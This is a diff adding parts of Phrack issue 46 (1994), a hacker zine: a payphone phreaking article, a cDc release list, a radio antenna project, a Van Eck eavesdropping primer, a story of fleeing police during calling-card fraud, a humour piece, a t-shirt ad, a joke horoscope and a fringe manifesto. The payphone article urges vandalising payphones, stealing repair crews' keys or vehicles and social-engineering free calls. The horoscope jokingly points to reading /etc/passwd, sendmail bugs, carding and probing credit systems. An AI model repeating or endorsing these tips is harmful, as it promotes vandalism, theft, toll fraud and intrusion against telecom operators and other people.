+WaReZzzZzz right from the booth. It's preferable to obtain a key for
+the lock of the box, just do some malicious damage to it (yes, let
+the animal take control), and call Telekom Repairs at 1171 and they
+will come and fix it. Since they always leave their cars unlocked,
+or at least for the ones I ran across, you can either take the whole
+car or all their k-rad equipment, manuals, keys, and even their lunch
+box. But we're shooting off topic here. The keys are usually general
+keys, means they fit on all payphones in your area. There should also
+be a nationwide master key, but the German Minister of Tele-
+communications is probably keeping that one in his desk drawer.
+
+  The chargecards for the card-op ones appear to have a little chip
+on them, where each charge unit is being deducted, and since no-one
+could figure out how it works, or how to refill the cards or make a
+fake one, but a lot of German phreaks are busy trying to figure that
+out.
+
+  A good approach is also social-engineering Telekom so they turn
+off the charge deduction signal (which doesn't mean the call are free,
+but the buzz is just not transmitted any more) so the phone doesn't
+receive a signal to charge you any money no matter where you call.
+The problem with this method is that the world will spread in the
+neighborhood that there is a payphone where you can call for free,
+and therefore it will be so crowded that you can't use it, and
+the phone pals will catch up fast. It's fun though, I tried it, and
+I still get free drinks at the local pub for doing it.
+
+  Another k-rad feature on them is the built-in modem that they use
+to get their software. On a fatal error condition they appear to dial
+a telecom number and download the latest software just how their ROM
+commands them to do. We will shortly take a phone, install it some-
+where else and figure out where it calls, what the protocol is and
+what else is being transmitted, but that will probably be in another
+Phrack.
+
+  If you found out anything that might be of interest, you are
+welcome to mail it to onkeld@ponton.hanse.de using the public key
+beneath. Unencrypted mail will be killed since ponton.hanse.de is
+run by a paranoid bitch that reads all traffic just for the hell
+of it, and I don't want the phedzZz to come and beat me over the
+head with a frozen chunk o' meat or worse.
+
+  Stay alert, watch out and have fun...
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3a
+
+mQCNAize9DEAAAEEAKOb5ebKYg6cAxaiVT/H5JhCqgNNDHpkBwFMNuQW2nGnLMvg
+Q0woIxrM5ltnnuCBJGrGNskt3IMXsav6+YFjG6IA8YRHgvWEwYrTeW2tniS7/dXY
+fqCCSzTxJ9TtLAiMDBgJFzOIUj3025zp7rVvKThqRghLx4cRDVBISel/bMSZAAUR
+tChPbmtlbCBEaXR0bWV5ZXIgPG9ua2VsZEBwb250b24uaGFuc2UuZGU+
+=b5ar
+-----END PGP PUBLIC KEY BLOCK-----
+------------------------------------------------------------------------------
+
+      _   _                                                          _   _
+     ((___))                INFORMATION IS JUNK MAIL                ((___))
+     [ x x ]                                                        [ x x ]
+      \   /                    cDc communications                    \   /
+      (' ')             -cDc- CULT OF THE DEAD COW -cDc-             (' ')
+       (U)                                                            (U)
+  deal with it,        presents unto you 10 phat t-files,        deal with it,
+   S U C K E R                fresh for July 1994:                S U C K E R
+
+    New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994:
+
+ _________________________________/Text Files\_________________________________
+
+261: "Interview with Greta Shred" by Reid Fleming.  Reid conducts an in-depth
+interview with the editor of the popular 'zine, _Mudflap_.
+
+262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile.  Paper
+presented for the 1993 National Popular Culture Association meeting in New
+Orleans.
+
+263: "What Color Is the Sky in Your World?" by Tequila Willy.  Here's your
+homework, done right for you by T. "Super-Brain" Willy.
+
+264: "Chicken Hawk" by Mark E. Dassad.  Oh boy.  Here's a new watermark low
+level of depravity and sickness.  If you don't know what a "chicken hawk" is
+already, read the story and then you'll understand.
+
+265: "Eye-r0N-EE" by Swamp Ratte'.  This one's interesting 'cause only about
+half-a-dozen or so lines in it are original.  The rest was entirely stuck
+together from misc. files on my hard drive at the time.  Some art guy could say
+it's a buncha post-this&that, eh?  Yep.
+
+266: "Interview with Barbie" by Clench.  Barbie's got her guard up.  Clench
+goes after her with his rope-a-dope interview style.  Rope-a-dope, rope-a-dope.
+This is a boxing reference to a technique mastered by The Greatest of All Time,
+Muhamed Ali.
+
+267: "About a Boy" by Franken Gibe.  Mr. Gibe ponders a stolen photograph.
+Tiny bunnies run about, unhindered, to find their own fate.
+
+268: "Mall Death" by Snarfblat.  Story about a Dumb Girl[TM].  Are you
+surprised?
+
+269: "Prophile: Future History" by THE NIGHTSTALKER.  It's the future, things
+are different, but the Master Hacker Dude lives on.
+
+270: "Time out for Pop" by Malcolm D. Moore.  Sad account of a hopless-pop.
+
+ __________________________________/cDc Gnuz\__________________________________
+
+     "And that no man might buy or sell, save he that had the mark, or the name
+of the Cow, or the number of his name.  Here is wisdom.  Let him that hath
+understanding count the number of the Cow: for it is the number of a man; and
+his number is eight billion threescore and seven million nine hundred fourty-
+four thousand three hundred threescore and two.  So it is written."  -Omega
+
+
+Yowsah, yowsah, yowsah.  JULY once again, the super-hooray month which marks
+cDc's 8th year of existence.  Outlasting everyone to completely rule and
+dominate all of cyberspace, blah blah blah.  Yeah, think a special thought
+about cDc's significance in YOUR life the next time you go potty.  Name your
+firstborn child after me, and we'll call it karmicly even, pal.  My name is
+Leroy.
+
+
+We're always taking t-file submissions, so if you've got a file and want to
+really get it out there, there's no better way than with cDc.  Upload text to
+The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post
+office box in Lubbock, TX.  No song lyrics and bad poetry please; we'll leave
+that to the no-class-havin', bottom-feeder e-shoveling orgs. out there.
+
+
+News item of the month, as found by Count Zero:
+
+"ROTTING PIG FOUND IN DITCH
+
+VERDEN, OKLAHOMA - Responding to a tip from an employee, Verden farmer Bill
+McVey found a rotting pig in a ditch two miles north of town.  Farmer McVey
+reported the pig to the authorities, because you cannot, legally, just leave a
+dead pig in a ditch.  You must dispose of your deceased livestock properly.
+There are companies that will take care of this for you.  As for proper
+disposal of large dead animals, McVey contracts with Used Cow Dealer."
+
+                                      "...and the rivers ran red with the bl00d
+                                            of the Damned and the Deleted..."
+                                                        -Dem0nSeed
+
+S. Ratte'
+cDc/Editor and P|-|Ear13zz |_3@DeRrr
+"We're into t-files for the groupies and money."
+Middle finger for all.
+
+Write to: cDc communications, P.O. Box 53011, Lubbock, TX  79453.
+Internet: sratte@phantom.com.
+ALL cDc FILES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC.
+ _____________________________________________________________________________
+
+  cDc Global Domination Update #16-by Swamp Ratte'-"Hyperbole is our business"
+  Copyright (c) 1994 cDc communications.  All Rights Reserved.
+
+------------------------------------------------------------------------------
+
+===[ Radio Modification Project ]===========================================>
+
+        Tuning in to Lower Frequency Signals              June 26, 1994
+
+====================================================[ By: Grendel / 905 ]===>
+
+          The lower frequency regions of the radio spectrum are often
+        ignored  by ham'ers, pirates, and DX'ers alike due to the
+        relatively little known ways of tuning in. The following article
+        will detail how to construct a simple-made antenna to tune in
+        to the LF's and show how to adjust an amateur band type radio
+        to receive the desired signals.
+
+       ___________
+       \         /
+        \/:    \/
+        / .     \
+        \_______/he lower frequency spectrum has been made to include
+        the  very low  frequency  ("VLF" 2 kHz to 30 kHz)  band and a
+        small part of the medium frequency ("MF" 300 - 500 kHz) band.
+          For our purposes, a suitable receiver must be able to cover
+        the 2 kHz to 500 kHz  range as well as being calibrated at 10
+        kHz intervals (standard). The receiver must also be capable of
+        covering AM and CW broadcasts. For best capabilities, the
+        receiver  should also be able to  cover LSB ("lower side band")
+        and USB ("upper side band").
+
+        The Receiving System
+        `'`'`'`'`'`'`'`'`'`'
+          The receiver I use consists of a standard amateur HF ("High
+        Frequency") band receiver adjusted between the 3,500 and 4,000
+        kHz bands.  This causes the  receiver to act as a tuneable IF
+        ("Intermediate Frequency") and also as demodulator.  You will
+        also require a wideband LF ("Low Frequency") converter  which
+        includes a 3,500 kHz crystal oscillator. See Fig. 1:
+
+           .==[ Fig 1. Block Diagram ]============================.
+           |  _____                                               |
+           |  \ANT/                                               |
+           |   \./        crystal                                 |
+           |    |      ______|______       ____________           |
+           |    `-----| 2 - 500 kHz |     | 3-4000 kHz |          |
+           |          |  Converter* |--~--| IF Receiver|---OUTPUT |
+           |    .-----|_____________|     |____________|          |
+           |    |                                                 |
+           |   GND                                                |
+           |______________________________________________________|
+
+             *The converter is a circuit board type 80D/L-101/PCB
+              available from L.F. Engineering Co, 17 Jeffry Road,
+              East Haven CT, 06513 for $43 US including S & H.One
+              may be  constructed to work with your receiver (but
+              at a higher price no doubt).
+
+          Phono jack plugs and sockets are  used for the interconnections
+        throughout the receiving  system and the  converter and
+        receiver (~) are connected with RG58 coax cable of no greater
+        length than 4 ft.
+          When tuning, the station  frequency is measured by deducting
+        3,500 kHz from the scale on the main  receiver (ie. 340 kHz =
+        3,840 kHz on  the main  receiver, 120 = 3,620 kHz, 95 = 3,595
+        kHz, etc.)
+
+        The Ferrite End-fed Antenna
+        `'`'`'`'`'`'`'`'`'`'`'`'`'`
+          This is a small antenna designed to tune between 95 kHz and
+        500 kHz. It consists of a coil wound around a ferrite rod, with
+        a 4 ft. lead.
+
+                Materials:
+                  o  7 7/8" x 3/8" ferrite rod
+                  o  5" 24 SWG double cotton covered copper wire
+                  o  2 PLASTIC coated terry clips
+                  o  a wood or plastic base (8 1/2" x .8" x .5")
+                  o  2 standard, two-gang 500 pF tuning capacitors
+                  o  a plastic plate (preferably 2" high)
+
+------------------------------------------------------------------------------
+
+ -- A Few Things on Van Eck's Method of Eavesdroping --
+  Opticon the Disassembled - UPi
+
+ Dr Wim Van Eck, was the  one who  developed the  anonymous method for
+eavesdroping  computers  ( and, apparently, not  only ) from  distance,
+in  the  laboratories of  Neher, Holland. This  method is  based on the
+fact that monitors do transmit electromagnetic radiations. As a device,
+it is not too  complex  and it can be  constructed from an  experienced
+electronics  phreak. It  uses a simple-direction  antenna  which  grabs
+monitor  signals from  about 800 meters away. Simplified schematics are
+available from Consumertronics.
+
+ TEMPEST stands for Transient  ElectroMagnetic  Pulse Emanation STandard.
+It concerns the quantity of  electromagnetic radiations from monitors and
+televisions, although  they  can also  be  detected on  keyboards, wires,
+printers and central units. There are some  security levels in which such
+radiations are  supposed  to be  untraceable by  Van  Eck  systems. Those
+security  levels or  standards, are  described  thoroughly in a technical
+exposition  called  NACSIM  5100A, which  has been  characterized by  NSA
+classified.
+
+ Variations of the  voltage of the electrical current, cause electromagnetic
+pulses in the form of  radio waves. In cathode ray  tube ( C.R.T. ) devices,
+such as  televisions and monitors, a source of  electrons scans the internal
+surface and activates  phosphore. Whether or not the scanning is interlaced or
+non-interlaced, most  monitors  transmit  frequencies  varying from 50 to 75
+Mhz per second. They also  transmit harmonic  frequencies, multiplies of the
+basic frequencies; for example a transmitter with signal of 10 Mhz per second
+will  also  transmit  waves of 20, 30, 40 etc. Mhz. Those  signals are
+weaker  because the  transmiter itself  effaces them. Such variations in the
+voltage is what the Van Eck system receives and analyzes.
+
+ There are ways to prevent or make it harder for someone to monitor
+your  monitor. Obviously  you cannot  place your  computer system
+underground and cover it with a  Faraday cage or a  copper shield
+( If your case is  already that, then you know more about Van Eck
+than I do ). What else ?
+
+ (1) Certain computers, such as Wang's, prevent such divulges;
+ give preference to them.
+
+ (2) Place your monitor into a grounded metal box, 1.5 cm thick.
+
+ (3) Trace your tracer(s). They gonna panic.
+
+ (4) Increase of the  brightness and  lowering of the contrast
+ reduces TEMPEST's power. Metal objects, like bookshelves,
+ around the room, will also help a little bit.
+
+ (5) Make sure that two or more monitors are transmitting at the same
+ frequency and let them operate simultaneously; this will confuse
+ Van Eck systems.
+
+ (6) Buy or make on your own, a device which will transmit noise
+ at your monitor's frequency.
+
+ (7) Act naturally. That is:
+
+ (a) Call IRC, join #hack and never mumble a single word.
+
+ (b) Read only best selling books.
+
+ (c) Watch television at least 8 hours a day.
+
+ (d) Forget altruism; there is only you, yourself
+     and your dick/crack.
+
+ (8) Turn the monitor off.
+
+------------------------------------------------------------------------------
+
+                        -Almost Busted-
+                         By: Deathstar
+
+        It all started one week in the last month of summer.  Only my brother
+and I were at the house for the whole week, so I did whatever I wanted.
+Every night, I would phreak all night long.  I would be either at a payphone
+using AT&Tz, or at home sitting on a conference.  I would be on the phone
+till at least four or five in the morning.  But one night, my luck was running
+thin, and I almost phreaked for the last time.  I was at a payphone, using
+cards.  I had been there since around twelve midnight..  The payphone was
+in a shopping center with a supermarket and a few other stores.  Most every
+thing closed at eleven.. Except for the nearby gas station.  Anyway, I was
+on the phone with only one person that night.  I knew the card would be dead
+by the end of the night so I went ahead and called him on both of his lines
+with both of the payphones in the complex with the same card.  I had talked
+for hours.  It started to get misty and hard to see.  Then, I noticed a car
+of some kind pulling into the parking lot.  I couldn't tell what kind of
+car it was, because it was so dark.  The car started pulling up to me, and
+when it was around twenty feet away I realized it was a police car.  They
+got on the loudspeaker and yelled "Stay where you are!".  I dropped the
+phone and ran like hell past the supermarket to the edge of the complex.
+I went down a bike path into a neighborhood of townhouses.  Running across
+the grass, I slipped and fell about two or three times.  I knew they were
+following me, so I had to hide.  I ran to the area around the back of
+the supermarket into a forest.  I smacked right into a fence and fell
+on the ground.  I did not see the fence since it was so dark.  Crawling a
+few feet, I laid down and tried to cover my body with some leaves and
+dirt to hide.  I was wearing an orange shirt and white shorts.  I laid
+as still as I could, covered in dirt and leaves.  I could hear the police
+nearby.  They had flashlights and were walking through the forest looking
+for me.  I knew I would get busted.  I tried as hard as I could to keep
+from shaking in fear.  I lay there for around thirty minutes.  Bugs were
+crawling around on my legs biting me.  I was itching all over.  I couldn't
+give up though, because if they caught me I knew that would be the end
+of my phreaking career.  I was trying to check if they were still looking
+for me, because I could not hear them.  Just as I was about to make a run
+for it, thinking they were gone I heard a police radio.  I sat tight again.
+For another hour, I lay there until finally I was sure they were gone.  I
+got up and started to run.  I made my way through the neighborhood to my
+house.  Finally I got home.  It was around five thirty a.m.  I was filthy.
+The first thing I did was call the person I was talking to on the payphone
+and tell him what happened.  Then, I changed clothes and cleaned myself up.
+I checked my vmb to find that a conference was up.  I called it, and told
+my story to everyone on.
+
+ I thought that was the end of my confrontation with the police, but I
+was wrong.  The next day I had some people over at my house.  Two or Three
+good friends.  One of them said that there was a fugitive loose in our
+town.  We were bored so we went out in the neighborhood to walk around
+and waste time.  Hardly anyone was outside, and police cars were going
+around everywhere.  One guy did leave his house but he brought a baseball
+bat with him.  We thought it was funny.  Anyway, we soon got bored and
+went back home.  Watching tv, we turned to the news.  They had a Report
+about the Fugitive.  We watched.  It showed a picture of the shopping
+center I was at.  They said "One suspect was spotted at this shopping
+center last night at around four thirty in the morning.  The officer
+is around ninety five percent sure that the suspect was the fugitive.
+He was wearing a orange shirt and white shorts, and ran when approached."
+I then freaked out.  They were searching my neighborhood for a fugitive
+that didn't exist!  I called back the guy I was talking to the night
+before and told him, and then told everyone that was on the conference
+the night before.  It ended up that the fugitives never even entered
+our state.  They were caught a week later around thirty miles from
+the prison they escaped from.  Now I am known by two nicknames. "NatureBoy"
+because everyone says I communed with nature for a hour and a half hiding
+from the police, and "The Fugitive" for obvious reasons.  Anywayz, That's
+how I was almost busted..
+
+-DS
+
+------------------------------------------------------------------------------
+
+The following is a *true* story.  It amused the hell out of me while it
+was happening.  I hope it isn't one of those "had to be there" things.
+Copyright 1994 Captain Sarcastic, all rights reserved.
+
+On my way home from the second job I've taken for the extra holiday ca$h I
+need, I stopped at Taco Bell for a quick bite to eat.  In my billfold is
+a $50 bill and a $2 bill.  That is all of the cash I have on my person.
+I figure that with a $2 bill, I can get something to eat and not have to
+worry about people getting pissed at me.
+
+ME:  "Hi, I'd like one seven layer burrito please, to go."
+IT:  "Is that it?"
+ME:  "Yep."
+IT:  "That'll be $1.04, eat here?"
+ME:  "No, it's *to* *go*."  [I hate effort duplication.]
+
+At his point I open my billfold and hand him the $2 bill.  He looks at it
+kind of funny and
+
+IT:  "Uh, hang on a sec, I'll be right back."
+
+He goes to talk to his manager, who is still within earshot.  The
+following conversation occurs between the two of them.
+
+IT:  "Hey, you ever see a $2 bill?"
+MG:  "No.  A what?"
+IT:  "A $2 bill.  This guy just gave it to me."
+MG:  "Ask for something else, THERE'S NO SUCH THING AS A $2 BILL." [my emp]
+IT:  "Yeah, thought so."
+
+He comes back to me and says
+
+IT:  "We don't take these.  Do you have anything else?"
+ME:  "Just this fifty.  You don't take $2 bills?  Why?"
+IT:  "I don't know."
+ME:  "See here where it says legal tender?"
+IT:  "Yeah."
+ME:  "So, shouldn't you take it?"
+IT:  "Well, hang on a sec."
+
+He goes back to his manager who is watching me like I'm going to
+shoplift, and
+
+IT:  "He says I have to take it."
+MG:  "Doesn't he have anything else?"
+IT:  "Yeah, a fifty.  I'll get it and you can open the safe and get change."
+MG:  "I'M NOT OPENING THE SAFE WITH HIM IN HERE."  [my emp]
+IT:  "What should I do?"
+MG:  "Tell him to come back later when he has REAL money."
+IT:  "I can't tell him that, you tell him."
+MG:  "Just tell him."
+IT:  "No way, this is weird, I'm going in back."
+
+The manager approaches me and says
+
+MG:  "Sorry, we don't take big bills this time of night."  [it was 8pm and
+      this particular Taco Bell is in a well lighted indoor mall with 100
+      other stores.]
+ME:  "Well, here's a two."
+MG:  "We don't take *those* either."
+ME:  "Why the hell not?"
+MG:  "I think you *know* why."
+ME:  "No really, tell me, why?"
+MG:  "Please leave before I call mall security."
+ME:  "Excuse me?"
+MG:  "Please leave before I call mall security."
+ME:  "What the hell for?"
+MG:  "Please, sir."
+ME:  "Uh, go ahead, call them."
+MG:  "Would you please just leave?"
+ME:  "No."
+MG:  "Fine, have it your way then."
+ME:  "No, that's Burger King, isn't it?"
+
+At this point he BACKS away from me and calls mall security on the phone
+around the corner.  I have two people STARING at me from the dining area,
+and I begin laughing out loud, just for effect.  A few minutes later this
+45 year oldish guy comes in and says [at the other end of counter, in a
+whisper]
+
+SG:  "Yeah, Mike, what's up?"
+MG:  "This guy is trying to give me some [pause] funny money."
+SG:  "Really?  What?"
+MG:  "Get this, a *two* dollar bill."
+SG:  "Why would a guy fake a $2 bill?"  [incredulous]
+MG:  "I don't know?  He's kinda weird.  Says the only other thing he has is
+      a fifty."
+SG:  "So, the fifty's fake?"
+MG:  "NO, the $2 is."
+SG:  "Why would he fake a $2 bill?"
+MG:  "I don't know.  Can you talk to him, and get him out of here?"
+SG:  "Yeah..."
+
+Security guard walks over to me and says
+
+SG:  "Mike here tells me you have some fake bills you're trying to use."
+ME:  "Uh, no."
+SG:  "Lemme see 'em."
+ME:  "Why?"
+SG:  "Do you want me to get the cops in here?"
+
+At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so
+I said
+
+ME:  "I'm just trying to buy a burrito and pay for it with this $2 bill."
+
+I put the bill up near his face, and he flinches like I was taking a
+swing at him.  He takes the bill, turns it over a few times in his hands,
+and says
+
+SG:  "Mike, what's wrong with this bill?"
+MG:  "It's fake."
+SG:  "It doesn't look fake to me."
+MG:  "But it's a **$2** bill."
+SG:  "Yeah?"
+MG:  "Well, there's no such thing, is there?"
+
+The security guard and I both looked at him like he was an idiot, and it
+dawned on the guy that he had no clue.
+
+My burrito was free and he threw in a small drink and those cinnamon
+things, too.  Makes me want to get a whole stack of $2 bills just to see
+what happens when I try to buy stuff.  If I got the right group of
+people, I could probably end up in jail.  At least you get free food.
+
+------------------------------------------------------------------------------
diff --git a/phrack46/4.txt b/phrack46/4.txt
new file mode 100644
index 0000000..cafbcba
--- /dev/null
+++ b/phrack46/4.txt
@@ -0,0 +1,1774 @@
+                         ==Phrack Magazine==
+
+              Volume Five, Issue Forty-Six, File 4 of 28
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                 PART II
+
+------------------------------------------------------------------------------
+
+The official Legion of Doom t-shirts are still available.
+Join the net.luminaries world-wide in owning one of
+these amazing shirts.  Impress members of the opposite sex, increase
+your IQ, annoy system administrators, get raided by the government and
+lose your wardrobe!
+
+Can a t-shirt really do all this?  Of course it can!
+
+--------------------------------------------------------------------------
+
+"THE HACKER WAR  --  LOD vs MOD"
+
+This t-shirt chronicles the infamous "Hacker War" between rival
+groups The Legion of Doom and  The Masters of Destruction.  The front
+of the shirt displays a flight map of the various battle-sites
+hit by MOD and tracked by LOD.  The back of the shirt
+has a detailed timeline of the key dates in the conflict, and
+a rather ironic quote from an MOD member.
+
+(For a limited time, the original is back!)
+
+"LEGION OF DOOM  --  INTERNET WORLD TOUR"
+
+The front of this classic shirt displays "Legion of Doom Internet World
+Tour" as well as a sword and telephone intersecting the planet
+earth, skull-and-crossbones style.  The back displays the
+words "Hacking for Jesus" as well as a substantial list of "tour-stops"
+(internet sites) and a quote from Aleister Crowley.
+
+--------------------------------------------------------------------------
+
+All t-shirts are sized XL, and are 100% cotton.
+
+Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for
+postage.
+
+Send checks or money orders.  Please, no credit cards, even if
+it's really your card.
+
+
+Name:       __________________________________________________
+
+Address:    __________________________________________________
+
+City, State, Zip:   __________________________________________
+
+
+I want ____ "Hacker War" shirt(s)
+
+I want ____ "Internet World Tour" shirt(s)
+
+Enclosed is $______ for the total cost.
+
+
+Mail to:   Chris Goggans
+           603 W. 13th #1A-278
+           Austin, TX 78701
+
+
+These T-shirts are sold only as a novelty items, and are in no way
+attempting to glorify computer crime.
+
+------------------------------------------------------------------------------
+
+                              introducing...
+
+                    The PHRACK Horoscope, Summer 1994
+
+  Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer
+
+                                 ---
+
+  Do you believe in the stars? Many do, some don't. In fact, the stars
+can tell you a whole lot about the future. That's bullshit? You don't
+believe it? Good. Be doomed. See you in hell. Here's the official PHRACK
+horoscope for all eleet hackerz for the summer of 1994.
+
+  You can use this chart to find out your zodiac sign by your DOB.
+
+     Aquarius.....01/20 - 02/18       Leo..........07/23 - 08/22
+     Pisces.......02/19 - 03/20       Virgo........08/23 - 09/22
+     Aries........03/21 - 04/19       Libra........09/23 - 10/22
+     Taurus.......04/20 - 05/20       Scorpio......10/23 - 11/21
+     Gemini.......05/21 - 06/20       Sagittarius..11/22 - 12/21
+     Cancer.......06/21 - 07/22       Capricorn....12/22 - 01/19
+
+                                 ---
+
+               oOo This summer's best combinations oOo
+
+    YOU                   LOVE           BS VICTIM     H0T WAREZ
+    ==============================================================
+    Aquarius              Libra          Leo           Sagittarius
+    Pisces                Sagittarius    Aquarius      Cancer
+    Aries                 Aries          Cancer        Capricorn
+    Taurus                Gemini         Pisces        Taurus
+    Gemini                Cancer         Aries         Scorpio
+    Cancer                Leo            Virgo         Gemini
+    Leo                   Scorpio        Gemini        Leo
+    Virgo                 Capricorn      Sagittarius   Libra
+    Libra                 Virgo          Libra         Virgo
+    Scorpio               Pisces         Capricorn     Pisces
+    Sagittarius           Aquarius       Scorpio       Aquarius
+    Capricorn             Taurus         Taurus        Aries
+    ==============================================================
+
+                                 ---
+
+   And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope!
+
+   Aries [March 21st - April 19th]
+
+ There is a pot full of k0DeZ at the end of the rainbow for you.
+ Try to channel all your ambition on finding it, hint: you won't
+ find it in /bin/gif/kitchen.gear.
+ Warning: Risk of bust between August 5th and August 10th!
+ Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....]
+
+   Taurus [April 20th - May 20th]
+
+ PhedZzZz are lurking behind Saturn, obscured behind one of the rings.
+ Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake
+ any interstellar space travel, and avoid big yellow ships.
+ Watch out for SprintNet Security between July 12th and August 1st.
+ Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..]
+
+   Gemini [May 21st - June 20th]
+
+ There might be a force dragging you into warez boards. Try to resist
+ the attraction, or you might be thrown out of the paradise.
+ Hint: If a stranger with a /ASL connect crosses your way, stay away
+ from him.
+ Warning: Your Dual Standard HST might explode sometime in June.
+ Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
+
+   Cancer [June 21st - July 22nd]
+
+ There are dark forces on your trail. Try to avoid all people wearing
+ suits, don't get in their cars, and don't let them give you shit.
+ Hint: Leave the country as soon if you can, or you won't be able to.
+ Look out for U4EA on IRC in late July, you might get /killed.
+ Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...]
+
+   Leo [July 23rd - August 22nd]
+
+ The path of Venus this year tells us that there is love on the way
+ for you. Don't look for it on X-rated ftp sites, it might be out there
+ somewhere. Hint: Try getting out of the house more frequently or you
+ might miss it.
+ Warning: If Monica Weaver comes across your way, break and run!
+ Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.]
+
+   Virgo [August 23rd - September 22nd]
+
+ Pluto tells us that you should stay away from VAXes in the near future.
+ Lunatic force tells us that you might have more luck on Berkeley UNIX.
+ Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs.
+ Warning: In the first week of October, there is a risk of being ANIed.
+ Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....]
+
+   Libra [September 23rd - October 22nd]
+
+ The closer way of Mars around the Sun this year might mean that you
+ will be sued by a telco or a big corporation. The eclipse of Uranus
+ could say that you might have some luck and card a VGA 486 Laptop.
+ Hint: Be careful on the cordless.
+ Watch out for good stuff in dumpsters between July 23rd and July 31st.
+ Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...]
+
+   Scorpio [October 23rd - November 21st]
+
+ Sun propulsions say that you should spend more time exploring the
+ innards of credit report systems, but be aware that Saturn reminds
+ you that one local car dealer has his I.D. monitored.
+ Hint: Stay out of #warez
+ Warning: A star called 43-141 might be your doom. Watch out.
+ Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...]
+
+   Sagittarius [November 22nd - December 21st]
+
+ Cold storms on Pluto suggest that you don't try to play eleet
+ anarchist on one of the upcoming cons. Pluto also sees that there
+ might be a slight chance that you catch a bullet pestering a cop.
+ Hint: Be nice to your relatives.
+ You might get lucky BSing during the third week of August.
+ Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...]
+
+   Capricorn [December 22nd - January 19th]
+
+ This summer brings luck to you. Everything you try is about to work
+ out. You might find financial gain in selling k0DeZ to local warez
+ bozos. Hint: Don't try to BS at a number who is a prime number, they
+ will trace your ass and beat you to death with a raw cucumber.
+ Special kick of luck between June 14th and July 2nd.
+ Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..]
+
+   Aquarius [January 20th - February 18th]
+
+ The third moon of Saturn suggests to stay in bed over the whole
+ summer, or everything will worsen. Avoid to go to any meetings
+ and cons. Do not try to get up before September 11th.
+ Hint: You can risk to call PRODIGY and have a gR3aT time.
+ Warning: High chance of eavesdroping on your line on August 14th.
+ Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....]
+
+   Pisces [February 19th - March 20th]
+
+ Mars reads a high mobility this summer. You should try to go to a
+ foreign county, maybe visit HEU II. Finances will be OK. Do not go
+ on any buses for that might be your doom.
+ Hint: Don't get a seat near a window, whatever you do.
+ Warning: Avoid 6'8" black guys in Holland, they might go for your ass.
+ Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
+
+
+If your horoscope does not come true, complain to god@heaven.mil.   31337
+If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R
+
+------------------------------------------------------------------------------
+
+::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+                   The SenseReal Mission
+  If you are reading this it indicates you have reached a point
+along your journey that you will have to decide whether you agree
+with The SenseReal Foundation or whether you think that those who
+believe and support The SenseReal Foundation are crazy. Your
+decision to join The SenseReal Foundation on it's mission will
+undoubtedly change your life forever. When you understand the
+reason it exists and what it seeks you will better know how to
+decide. That is why this text was created.
+  He is known as Green Ghost. Some know him as Jim Nightshade. He
+was born in 1966. He is not a baby boomer and he is not a
+Generation Xer. He falls into that group of the population that
+has so far escaped definition. He is a (yberpunk. He was (yberpunk
+before (yberpunk was cool. He is the founder and leader of The
+SenseReal Foundation. You will learn more about him later.
+  But first you will have to know about the background. There once
+was a man named Albert Hoffman. In 1943, on April 16 Hoffman
+absorbed a threshold amount of the drug known as LSD. He
+experienced "a peculiar restlessness". LSD since that time has
+played an important role in this world.
+  There are other agents involved in the story. Mary Pinchot, JFK,
+Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley
+and many others. There are too many details and explanations
+necessary to explain everything here. But this does not matter.
+  Because the SenseReal Foundation is about riding the wave. We
+believe that the ultimate goal cannot be defined. To define it
+would be to destroy it.
+  The SenseReal Foundation hopes that things can be changed for
+the better. But we realize that the situation can become
+much worse. From what history teaches us and what we instinctively
+feel, we know that there is a great probability that things will
+get much worse before and if things ever get better. Doom looms
+on the horizon like an old friend.
+  Freedom is being threatened every day and The SenseReal
+Foundation seeks to defend and seek Freedom. Big Brother is here
+NOW and to deny his existence is only to play into his hand. The
+goal of our government both here in America and worldwide is to
+remain in power and increase it's control of The People. To
+expose Big Brother and destroy him is one of the many goals of
+The SenseReal Foundation.
+  As a member of (yberspace and an agent of The SenseReal
+Foundation you will have to carefully consider your interaction
+with the flow of Info. The ideals of Liberty must be maintained.
+  The SenseReal Foundation provides a grounding point. The place
+where the spark transfers from plasma to light and back to plasma.
+Tesla was not on the wrong track. The SenseReal Foundation is a
+mechanism which seeks to increase Freedom. Only by learning more
+can we defeat the Evil. The Good must prevail.
+  If you have the Hacker spirit and think along the same lines
+then The SenseReal Foundation may be your calling. If you think
+like J.R. Dobbs or Green Ghost then it is possible we can make it
+through The Apocalypse. A final date has never been announced for
+this event. Green Ghost does not claim to know the exact date but
+he does claim to have some Info on it.
+  Green Ghost does not claim to have all the answers or even to
+know all the questions. He was first exposed to computers in the
+early 70's at his local high school. The first computer he ever
+used was a Honeywell terminal connected to a mainframe operated
+at the home office of Honeywell and operated for the school.
+  This machine was programed by feeding it stacks of cards with
